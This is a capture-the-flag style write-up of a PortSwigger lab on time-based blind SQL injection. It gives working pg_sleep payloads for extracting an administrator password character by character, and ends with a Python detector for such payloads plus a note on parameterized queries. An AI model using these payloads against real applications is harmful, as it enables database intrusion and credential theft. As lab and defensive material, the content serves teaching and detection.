[PortSwigger Web Security Academy labs] SQL Injection series, 12th


Subject

Lab: Blind SQL injection with time delays and information retrieval

Url: portswigger.net/web-securit…


Mind Palace

Confirm that time-based blind injection is feasible (the true condition should delay the response, the false one should not):

';select case when (1=1) then pg_sleep(3) else pg_sleep(0) end--
';select case when (1=2) then pg_sleep(3) else pg_sleep(0) end--
# ==> URL-encode before use (; -> %3b)

Confirm that the users table has a username column and that an administrator account exists:

';select case when (username='administrator') then pg_sleep(10) else pg_sleep(0) end from users--

Use Burp's Intruder module to determine the password length:

';select case when (username='administrator' and length(password)>3) then pg_sleep(10) else pg_sleep(0) end from users--

Time-based blind injection:

# core payload
';select case when (substring(password,1,1)='a') then pg_sleep(10) else pg_sleep(0) end from users where username='administrator'--

Next, use Burp's Intruder module with the cluster bomb attack type to retrieve the password character by character.

==> Arranging the results in position order gives password = hpolhe7xsrnp25ftjvqj
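From the defender's side, the payload shape used throughout this lab (a quote closing the original literal, a stacked statement, a CASE WHEN conditional and a pg_sleep() delay, all URL-encoded) is easy to flag in proxy or WAF logs. The following detector is an added example, not part of the original post; the parameter values it scans are constructed samples.

```python
"""Flag time-based blind SQL injection attempts in logged parameter values.
Added example (not from the original post); SAMPLE_VALUES are constructed."""
import re
from urllib.parse import unquote

# Indicators drawn from the payload shape in this lab.
STACKED_STMT = re.compile(r"['\"]\s*;\s*(select|update|insert|delete)\b", re.I)
SLEEP_CALL = re.compile(r"\bpg_sleep\s*\(\s*\d+(\.\d+)?\s*\)", re.I)
CASE_WHEN = re.compile(r"\bcase\s+when\b.*\bthen\b.*\bend\b", re.I | re.S)
COMMENT_TAIL = re.compile(r"--\s*$")


def decode(value: str) -> str:
    """URL-decode until stable (catches double encoding), collapse whitespace."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return " ".join(value.split())


def score(value: str) -> dict:
    """Report which indicators fire on one parameter value plus a verdict."""
    text = decode(value)
    hits = {
        "stacked_statement": bool(STACKED_STMT.search(text)),
        "sleep_call": bool(SLEEP_CALL.search(text)),
        "case_when": bool(CASE_WHEN.search(text)),
        "comment_tail": bool(COMMENT_TAIL.search(text)),
    }
    # A sleep call is the time-based signature; a stacked statement wrapped in a
    # conditional is the same technique even if the sleep function is renamed.
    hits["suspicious"] = hits["sleep_call"] or (
        hits["stacked_statement"] and hits["case_when"]
    )
    return hits


SAMPLE_VALUES = [  # constructed cookie values, as a proxy might log them
    "x9Kp2fQ",
    "%27%3bselect%20case%20when%20(1%3d1)%20then%20pg_sleep(3)%20else%20pg_sleep(0)%20end--",
    "%2527%253bselect%2520pg_sleep(10)--",  # double-encoded
    "O%27Brien",  # legitimate apostrophe, must not be flagged
]


def scan(values):
    """Return the values that look like time-based injection attempts."""
    return [v for v in values if score(v)["suspicious"]]


if __name__ == "__main__":
    for v in SAMPLE_VALUES:
        print(score(v)["suspicious"], decode(v))
```

The real fix is on the server: bind the cookie value as a parameter in the query so that the quote and semicolon never reach the SQL parser; the detector only tells you that someone is probing.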
